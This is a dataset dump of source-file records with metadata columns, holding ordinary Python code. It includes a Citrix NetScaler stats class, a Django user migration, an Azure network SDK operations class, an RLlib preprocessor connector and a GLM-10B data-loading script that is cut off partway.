blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
5f570981e26c2bac4086a1ffe4a40b861456aeb1 | 687928e5bc8d5cf68d543005bb24c862460edcfc | /nssrc/com/citrix/netscaler/nitro/resource/stat/network/rnatip_stats.py | ff47d65c3c79e5bbfd9e2bf5f9e1a3baa6292bb4 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"Python-2.0"
] | permissive | mbs91/nitro | c6c81665d6abd04de8b9f09554e5e8e541f4a2b8 | be74e1e177f5c205c16126bc9b023f2348788409 | refs/heads/master | 2021-05-29T19:24:04.520762 | 2015-06-26T02:03:09 | 2015-06-26T02:03:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,255 | py | #
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class rnatip_stats(base_resource) :
""" Statistics for RNAT ipaddress resource.
"""
def __init__(self) :
self._Rnatip = ""
self._clearstats = ""
self._iptd = 0
self._iprnattotrxbytes = 0
self._iprnatrxbytesrate = 0
self._iprnattottxbytes = 0
self._iprnattxbytesrate = 0
self._iprnattotrxpkts = 0
self._iprnatrxpktsrate = 0
self._iprnattottxpkts = 0
self._iprnattxpktsrate = 0
self._iprnattottxsyn = 0
self._iprnattxsynrate = 0
self._iprnatcursessions = 0
@property
def Rnatip(self) :
"""Specifies the NAT IP address of the configured RNAT entry for which you want to see the statistics. If you do not specify an IP address, this displays the statistics for all the configured RNAT entries.<br/>Minimum length = 1.
"""
try :
return self._Rnatip
except Exception as e:
raise e
@Rnatip.setter
def Rnatip(self, Rnatip) :
"""Specifies the NAT IP address of the configured RNAT entry for which you want to see the statistics. If you do not specify an IP address, this displays the statistics for all the configured RNAT entries.
"""
try :
self._Rnatip = Rnatip
except Exception as e:
raise e
@property
def clearstats(self) :
"""Clear the statsistics / counters.<br/>Possible values = basic, full.
"""
try :
return self._clearstats
except Exception as e:
raise e
@clearstats.setter
def clearstats(self, clearstats) :
"""Clear the statsistics / counters
"""
try :
self._clearstats = clearstats
except Exception as e:
raise e
@property
def iprnatrxpktsrate(self) :
"""Rate (/s) counter for iprnattotrxpkts.
"""
try :
return self._iprnatrxpktsrate
except Exception as e:
raise e
@property
def iprnattxpktsrate(self) :
"""Rate (/s) counter for iprnattottxpkts.
"""
try :
return self._iprnattxpktsrate
except Exception as e:
raise e
@property
def iprnattottxpkts(self) :
"""Packets sent from this IP address during RNAT sessions.
"""
try :
return self._iprnattottxpkts
except Exception as e:
raise e
@property
def iptd(self) :
"""Traffic domain for ipaddr.
"""
try :
return self._iptd
except Exception as e:
raise e
@property
def iprnattottxbytes(self) :
"""Bytes sent from this IP address during RNAT sessions.
"""
try :
return self._iprnattottxbytes
except Exception as e:
raise e
@property
def iprnatcursessions(self) :
"""Currently active RNAT sessions started from this IP address.
"""
try :
return self._iprnatcursessions
except Exception as e:
raise e
@property
def iprnatrxbytesrate(self) :
"""Rate (/s) counter for iprnattotrxbytes.
"""
try :
return self._iprnatrxbytesrate
except Exception as e:
raise e
@property
def iprnattotrxbytes(self) :
"""Bytes received on this IP address during RNAT sessions.
"""
try :
return self._iprnattotrxbytes
except Exception as e:
raise e
@property
def iprnattxsynrate(self) :
"""Rate (/s) counter for iprnattottxsyn.
"""
try :
return self._iprnattxsynrate
except Exception as e:
raise e
@property
def iprnattxbytesrate(self) :
"""Rate (/s) counter for iprnattottxbytes.
"""
try :
return self._iprnattxbytesrate
except Exception as e:
raise e
@property
def iprnattotrxpkts(self) :
"""Packets received on this IP address during RNAT sessions.
"""
try :
return self._iprnattotrxpkts
except Exception as e:
raise e
@property
def iprnattottxsyn(self) :
"""Requests for connections sent from this IP address during RNAT sessions.
"""
try :
return self._iprnattottxsyn
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(rnatip_response, response, self.__class__.__name__.replace('_stats',''))
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.rnatip
except Exception as e :
raise e
def _get_object_name(self) :
""" Returns the value of object identifier argument
"""
try :
if (self.Rnatip) :
return str(self.Rnatip)
return None
except Exception as e :
raise e
@classmethod
def get(cls, service, name="", option_="") :
""" Use this API to fetch the statistics of all rnatip_stats resources that are configured on netscaler.
"""
try :
obj = rnatip_stats()
if not name :
response = obj.stat_resources(service, option_)
else :
obj.Rnatip = name
response = obj.stat_resource(service, option_)
return response
except Exception as e:
raise e
class Clearstats:
basic = "basic"
full = "full"
class rnatip_response(base_response) :
def __init__(self, length=1) :
self.rnatip = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.rnatip = [rnatip_stats() for _ in range(length)]
| [
"[email protected]"
] | |
3fe7e554cfc697b434f4888e6a7b0dd0b813f539 | 4b850a7766d659ef936978e3051b35864fe6d04a | /source/images/topomut_exp_decay_2.py | 9ab6f25bdbdd97f25cd740507ef96ba5f0178564 | [] | no_license | bogdanvuk/phd | 239720dc9c396c500994d41cdf72d1870a358804 | 3ba99aa16a9a2553bae28107636473ebf9b04dd0 | refs/heads/master | 2020-12-29T19:03:41.821908 | 2016-11-20T10:26:29 | 2016-11-20T10:26:29 | 68,291,585 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 119 | py | from topomut_exp_decay import plot_topomut
plt = plot_topomut(180, 60, topo_mut=[0.6], loc="lower right")
plt.show()
| [
"[email protected]"
] | |
168517ec05262d912eb911a4fbe552334aea188a | 5a43074c6c26a5dca27ba15a09468de0a2c7c654 | /chapt9/train2/train2.py | 25ee22110f449cf88a49a64a276720e65e0de135 | [] | no_license | NHRD/The-second | 76e922da542da5e7bb36a14d6bd942eb0a9d2c98 | cb02544e23b826345224d9591d0e23499485aae0 | refs/heads/master | 2020-03-17T00:49:11.022011 | 2018-05-13T12:38:14 | 2018-05-13T12:38:14 | 133,130,782 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 100 | py | import cubed
num = float(input("Input float num:"))
result = cubed.cubic(num)
print(result)
| [
"[email protected]"
] | |
783de3fff23bcde48f9048bc5d4df16607e2da6c | 39157aabbbab0f7824138a31ee26fbf88853e601 | /users/migrations/0001_initial.py | 2aeb55036fc284fbf105e0ea7fffddaaa53843ef | [
"MIT"
] | permissive | CecileSerene/uptv | 825d9bb0dc7e44cc8e7224632403b82f30443b07 | 47bd79b34d409405396e9640c18578837d45e91b | refs/heads/master | 2020-04-10T22:59:43.281114 | 2018-11-06T12:22:32 | 2018-11-06T12:22:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,952 | py | # Generated by Django 2.1.2 on 2018-10-12 08:34
import django.contrib.auth.models
import django.contrib.auth.validators
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0009_alter_user_last_name_max_length'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('username', models.CharField(error_messages={'unique': 'A user with that username already exists.'}, help_text='Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=150, unique=True, validators=[django.contrib.auth.validators.UnicodeUsernameValidator()], verbose_name='username')),
('first_name', models.CharField(blank=True, max_length=30, verbose_name='first name')),
('last_name', models.CharField(blank=True, max_length=150, verbose_name='last name')),
('email', models.EmailField(blank=True, max_length=254, verbose_name='email address')),
('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')),
('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active')),
('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')),
('avatar', models.ImageField(blank=True, null=True, upload_to='')),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'verbose_name': 'user',
'verbose_name_plural': 'users',
'abstract': False,
},
managers=[
('objects', django.contrib.auth.models.UserManager()),
],
),
]
| [
"[email protected]"
] | |
f3d08f6599133229000a463854dc0c353b87bf4c | a838d4bed14d5df5314000b41f8318c4ebe0974e | /sdk/network/azure-mgmt-network/azure/mgmt/network/v2020_08_01/aio/operations/_peer_express_route_circuit_connections_operations.py | 9c16d68810402a80d26aeca6f5d45cd563bb9ae9 | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] | permissive | scbedd/azure-sdk-for-python | ee7cbd6a8725ddd4a6edfde5f40a2a589808daea | cc8bdfceb23e5ae9f78323edc2a4e66e348bb17a | refs/heads/master | 2023-09-01T08:38:56.188954 | 2021-06-17T22:52:28 | 2021-06-17T22:52:28 | 159,568,218 | 2 | 0 | MIT | 2019-08-11T21:16:01 | 2018-11-28T21:34:49 | Python | UTF-8 | Python | false | false | 9,352 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class PeerExpressRouteCircuitConnectionsOperations:
"""PeerExpressRouteCircuitConnectionsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2020_08_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def get(
self,
resource_group_name: str,
circuit_name: str,
peering_name: str,
connection_name: str,
**kwargs
) -> "_models.PeerExpressRouteCircuitConnection":
"""Gets the specified Peer Express Route Circuit Connection from the specified express route
circuit.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param circuit_name: The name of the express route circuit.
:type circuit_name: str
:param peering_name: The name of the peering.
:type peering_name: str
:param connection_name: The name of the peer express route circuit connection.
:type connection_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: PeerExpressRouteCircuitConnection, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_08_01.models.PeerExpressRouteCircuitConnection
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PeerExpressRouteCircuitConnection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'circuitName': self._serialize.url("circuit_name", circuit_name, 'str'),
'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
'connectionName': self._serialize.url("connection_name", connection_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('PeerExpressRouteCircuitConnection', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/expressRouteCircuits/{circuitName}/peerings/{peeringName}/peerConnections/{connectionName}'} # type: ignore
def list(
self,
resource_group_name: str,
circuit_name: str,
peering_name: str,
**kwargs
) -> AsyncIterable["_models.PeerExpressRouteCircuitConnectionListResult"]:
"""Gets all global reach peer connections associated with a private peering in an express route
circuit.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param circuit_name: The name of the circuit.
:type circuit_name: str
:param peering_name: The name of the peering.
:type peering_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either PeerExpressRouteCircuitConnectionListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2020_08_01.models.PeerExpressRouteCircuitConnectionListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PeerExpressRouteCircuitConnectionListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'circuitName': self._serialize.url("circuit_name", circuit_name, 'str'),
'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('PeerExpressRouteCircuitConnectionListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/expressRouteCircuits/{circuitName}/peerings/{peeringName}/peerConnections'} # type: ignore
| [
"[email protected]"
] | |
bc0bcf60649a00c4d9f7212b42af2077cb311863 | d954e2f74d1186c8e35be8ea579656513d8d3b98 | /rllib/connectors/agent/obs_preproc.py | 93f016e1e22a3f7275f5ed6e1bc017d7b3ecd56e | [
"MIT",
"BSD-3-Clause",
"Apache-2.0"
] | permissive | vakker/ray | a865de214e60f9e62d61c03ae7ce55ad6030f84c | de238dd626a48a16c8b3cd006f3482db75f63a83 | refs/heads/master | 2023-01-23T22:30:44.839942 | 2022-10-23T01:05:48 | 2022-10-23T01:05:48 | 171,845,804 | 0 | 1 | Apache-2.0 | 2023-01-14T08:01:04 | 2019-02-21T09:54:36 | Python | UTF-8 | Python | false | false | 2,447 | py | from typing import Any
from ray.rllib.connectors.connector import (
AgentConnector,
ConnectorContext,
register_connector,
)
from ray.rllib.models.preprocessors import get_preprocessor
from ray.rllib.policy.sample_batch import SampleBatch
from ray.rllib.utils.typing import AgentConnectorDataType
from ray.util.annotations import PublicAPI
# Bridging between current obs preprocessors and connector.
# We should not introduce any new preprocessors.
# TODO(jungong) : migrate and implement preprocessor library in Connector framework.
@PublicAPI(stability="alpha")
class ObsPreprocessorConnector(AgentConnector):
"""A connector that wraps around existing RLlib observation preprocessors.
This includes:
- OneHotPreprocessor for Discrete and Multi-Discrete spaces.
- GenericPixelPreprocessor and AtariRamPreprocessor for Atari spaces.
- TupleFlatteningPreprocessor and DictFlatteningPreprocessor for flattening
arbitrary nested input observations.
- RepeatedValuesPreprocessor for padding observations from RLlib Repeated
observation space.
"""
def __init__(self, ctx: ConnectorContext):
super().__init__(ctx)
if hasattr(ctx.observation_space, "original_space"):
# ctx.observation_space is the space this Policy deals with.
# We need to preprocess data from the original observation space here.
obs_space = ctx.observation_space.original_space
else:
obs_space = ctx.observation_space
self._preprocessor = get_preprocessor(obs_space)(
obs_space, ctx.config.get("model", {})
)
def transform(self, ac_data: AgentConnectorDataType) -> AgentConnectorDataType:
d = ac_data.data
assert (
type(d) == dict
), "Single agent data must be of type Dict[str, TensorStructType]"
if SampleBatch.OBS in d:
d[SampleBatch.OBS] = self._preprocessor.transform(d[SampleBatch.OBS])
if SampleBatch.NEXT_OBS in d:
d[SampleBatch.NEXT_OBS] = self._preprocessor.transform(
d[SampleBatch.NEXT_OBS]
)
return ac_data
def to_state(self):
return ObsPreprocessorConnector.__name__, None
@staticmethod
def from_state(ctx: ConnectorContext, params: Any):
return ObsPreprocessorConnector(ctx)
register_connector(ObsPreprocessorConnector.__name__, ObsPreprocessorConnector)
| [
"[email protected]"
] | |
f3123e9c31e2c9ec19753cac3d6daa669ffa7fe7 | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/built-in/foundation/GLM-10B/configure_data.py | 9365cd518877885c9f0a276a850b14ec9414fab1 | [
"GPL-1.0-or-later",
"MIT",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 18,384 | py | # coding=utf-8
# Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved.
# Copyright 2023 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""parses arguments and preps data loader"""
import os
import copy
import random
import numpy as np
import torch
import torch.utils.data
import data_utils
from blocklm_utils import ConstructBlockStrategy
from data_utils.tokenization import make_tokenizer
from utils import print_rank_0
from itertools import accumulate
from bisect import bisect_right
from tasks.superglue.dataset import SuperGlueDataset
import mpu
class MultiTaskDataset(torch.utils.data.Dataset):
def __init__(self, tasks, datasets, reweight=True, temperature=0.8, max_limit=200000):
super(MultiTaskDataset, self).__init__()
self.tasks = tasks
self.datasets = datasets
self.reweight = reweight
self.temperature = temperature
self.lens = [len(dataset) for dataset in datasets]
self.weights = np.array([min(l, max_limit) ** temperature for l in self.lens])
self.total_len = sum(self.lens)
self.cumulative_lens = list(accumulate(self.lens))
if self.reweight:
print_rank_0(list(zip(self.tasks, self.lens, self.weights)))
else:
print_rank_0(list(zip(self.tasks, self.lens)))
self.weights /= self.weights.sum()
def __len__(self):
return self.total_len * 1000
@staticmethod
def pet_wrapper(data):
text = data['text']
loss_mask = data['logit_mask']
target = data['target']
attention_mask = data['mask']
position_id = data['position']
label = data['label']
if len(text.shape) == 2:
text = text[label]
loss_mask = loss_mask[label]
target = target[label]
attention_mask = attention_mask[label]
position_id = position_id[label]
else:
target = target[label]
if not target.shape:
target = target.repeat(len(text))
return {'text': text, 'target': target, 'loss_mask': loss_mask, 'position_id': position_id,
'attention_mask': attention_mask}
def __getitem__(self, idx):
if self.reweight:
rng = random.Random(idx)
rng = np.random.RandomState(seed=[rng.randint(0, 2 ** 32 - 1) for _ in range(16)])
dataset_idx = rng.choice(np.arange(len(self.datasets)), p=self.weights)
dataset = self.datasets[dataset_idx]
sample_idx = rng.choice(np.arange(len(dataset)))
item = self.datasets[dataset_idx][sample_idx]
else:
dataset_idx = bisect_right(self.cumulative_lens, idx)
if dataset_idx == 0:
sample_idx = idx
else:
sample_idx = idx - self.cumulative_lens[dataset_idx - 1]
item = self.datasets[dataset_idx][sample_idx]
item = self.pet_wrapper(item)
return item
class DataConfig:
def __init__(self, defaults=None):
super(DataConfig, self).__init__()
if defaults is None:
defaults = {}
self.defaults = defaults
def apply(self, args, tokenizer):
if torch.distributed.get_rank() == 0:
print('configuring data')
self.apply_defaults(args)
return make_loaders(args, tokenizer)
def set_defaults(self, **kwargs):
for k, v in kwargs.items():
self.defaults[k] = v
def apply_defaults(self, args):
for k, v in self.defaults.items():
k = k.replace('-', '_')
if not hasattr(args, k):
setattr(args, k, v)
def prepare_tokenizer(args):
add_sentinel_token = 0
if args.sentinel_token:
add_sentinel_token = args.max_position_embeddings
tokenizer = make_tokenizer(args.tokenizer_type, None, args.tokenizer_path, args.vocab_size,
args.tokenizer_model_type, add_block_symbols=args.block_lm, cache_dir=args.cache_dir,
add_sentinel_token=add_sentinel_token, add_task_mask=args.task_mask,
add_decoder_mask=args.block_mask_prob > 0.0 or args.context_mask_ratio > 0.0,
fix_command_token=args.fix_command_token)
if mpu.get_model_parallel_rank() == 0:
num_tokens = tokenizer.num_tokens
eod_token = tokenizer.get_command('eos').Id
assert eod_token == tokenizer.get_command('pad').Id
before = num_tokens
after = before
multiple = args.make_vocab_size_divisible_by
while (after % multiple) != 0:
after += 1
print_rank_0('> padded vocab (size: {}) with {} dummy '
'tokens (new size: {})'.format(before, after - before, after))
print_rank_0('> found end-of-document token: {}'.format(eod_token))
token_counts = torch.cuda.LongTensor([after, eod_token])
else:
token_counts = torch.cuda.LongTensor([0, 0])
# Broadcast num tokens.
torch.distributed.broadcast(token_counts,
mpu.get_model_parallel_src_rank(),
group=mpu.get_model_parallel_group())
num_tokens = token_counts[0].item()
eod_token = token_counts[1].item()
args.vocab_size, args.eod_token = num_tokens, eod_token
return tokenizer
def make_data_loader(dataset, tokenizer, batch_size, num_iters, args, shuffle=False, block_collate=False):
world_size = torch.distributed.get_world_size(group=mpu.get_data_parallel_group())
rank = torch.distributed.get_rank(group=mpu.get_data_parallel_group())
if args.loader_scatter is not None:
rank = rank // args.loader_scatter
world_size = world_size // args.loader_scatter
batch_size = batch_size // args.loader_scatter
distributed = world_size > 1
if args.transformer_xl:
batch_sampler = data_utils.samplers.DistributedSequentialSampler(len(dataset),
num_iters,
batch_size,
rank,
world_size)
else:
if shuffle:
sampler = data_utils.samplers.RandomSampler(dataset, replacement=True,
num_samples=batch_size * args.train_iters * args.gradient_accumulation_steps)
else:
sampler = torch.utils.data.SequentialSampler(dataset)
drop_last = distributed
# the GPUs in the same model parallel group receive the same data
if distributed:
batch_sampler = data_utils.samplers.DistributedBatchSampler(sampler, batch_size, drop_last, rank,
world_size,
gradient_accumulation_steps=args.gradient_accumulation_steps)
else:
batch_sampler = torch.utils.data.BatchSampler(sampler,
batch_size,
drop_last)
collate_fn = None
if block_collate:
collate_fn = ConstructBlockStrategy(args, tokenizer, args.seq_length, bert_prob=args.bert_prob,
gap_sentence_prob=args.gap_sentence_prob,
gap_sentence_ratio=args.gap_sentence_ratio,
gpt_infill_prob=args.gpt_infill_prob,
average_block_length=args.avg_block_length,
gpt_min_ratio=args.gpt_min_ratio,
block_mask_prob=args.block_mask_prob,
context_mask_ratio=args.context_mask_ratio,
short_seq_prob=args.short_seq_prob,
single_span_prob=args.single_span_prob,
shuffle_blocks=not args.no_shuffle_block,
block_position_encoding=not args.no_block_position,
sentinel_token=args.sentinel_token,
encoder_decoder=args.encoder_decoder,
task_mask=args.task_mask, random_position=args.random_position,
masked_lm=args.masked_lm).construct_blocks
data_loader = torch.utils.data.DataLoader(dataset,
batch_sampler=batch_sampler,
num_workers=args.num_workers,
pin_memory=True,
collate_fn=collate_fn)
return data_loader
def make_tfrecord_loaders(args):
"""Load train/val/test dataset from shuffled TFRecords"""
import data_utils.tf_dl
data_set_args = {'batch_size': args.batch_size,
'max_seq_len': args.seq_length,
'max_preds_per_seq': args.max_preds_per_seq,
'train': True,
'num_workers': max(args.num_workers, 1),
'seed': args.seed + args.rank + 1,
'threaded_dl': args.num_workers > 0
}
train = data_utils.tf_dl.TFRecordDataLoader(args.train_data,
**data_set_args)
data_set_args['train'] = False
if args.eval_seq_length is not None:
data_set_args['max_seq_len'] = args.eval_seq_length
if args.eval_max_preds_per_seq is not None:
data_set_args['max_preds_per_seq'] = args.eval_max_preds_per_seq
valid = None
if args.valid_data is not None:
valid = data_utils.tf_dl.TFRecordDataLoader(args.valid_data,
**data_set_args)
test = None
if args.test_data is not None:
test = data_utils.tf_dl.TFRecordDataLoader(args.test_data,
**data_set_args)
tokenizer = data_utils.make_tokenizer(args.tokenizer_type,
train,
args.tokenizer_path,
args.vocab_size,
args.tokenizer_model_type,
cache_dir=args.cache_dir)
return (train, valid, test), tokenizer
def make_loaders(args, tokenizer):
"""makes training/val/test"""
if args.use_tfrecords:
return make_tfrecord_loaders(args)
world_size = torch.distributed.get_world_size(group=mpu.get_data_parallel_group())
if args.loader_scatter is not None:
assert world_size % args.loader_scatter == 0
batch_size = args.batch_size * world_size
eval_batch_size = batch_size
if args.eval_batch_size is not None:
eval_batch_size = args.eval_batch_size * world_size
seq_length = args.seq_length
if seq_length < 0:
seq_length = seq_length * world_size
eval_seq_length = args.eval_seq_length
if eval_seq_length is not None and eval_seq_length < 0:
eval_seq_length = eval_seq_length * world_size
split = get_split(args)
data_set_args = {
'path': args.train_data,
'seq_length': seq_length,
'mem_length': args.mem_length,
'delim': args.delim,
'text_key': args.text_key,
'label_key': 'label',
'ds_type': args.data_set_type,
'split': split,
'loose': args.loose_json,
'max_preds_per_seq': args.max_preds_per_seq,
'presplit_sentences': args.presplit_sentences,
'sample_one_document': args.sample_one_document,
'filter_english': args.filter_english,
'pre_tokenize': not args.no_pre_tokenize,
'tokenizer': tokenizer,
'save_splits': args.save_splits,
'load_splits': args.load_splits,
'save_test_data': args.save_test_data,
'no_lazy_loader': args.no_lazy_loader,
'loader_scatter': args.loader_scatter,
'data_parallel_rank': mpu.get_data_parallel_rank(),
"non_sentence_start": args.non_sentence_start,
"half_lazy_loader": args.half_lazy_loader
}
eval_set_args = copy.copy(data_set_args)
eval_set_args['split'] = [1.]
# if optional eval args were set then replace their
# equivalent values in the arg dict
if eval_seq_length:
eval_set_args['seq_length'] = eval_seq_length
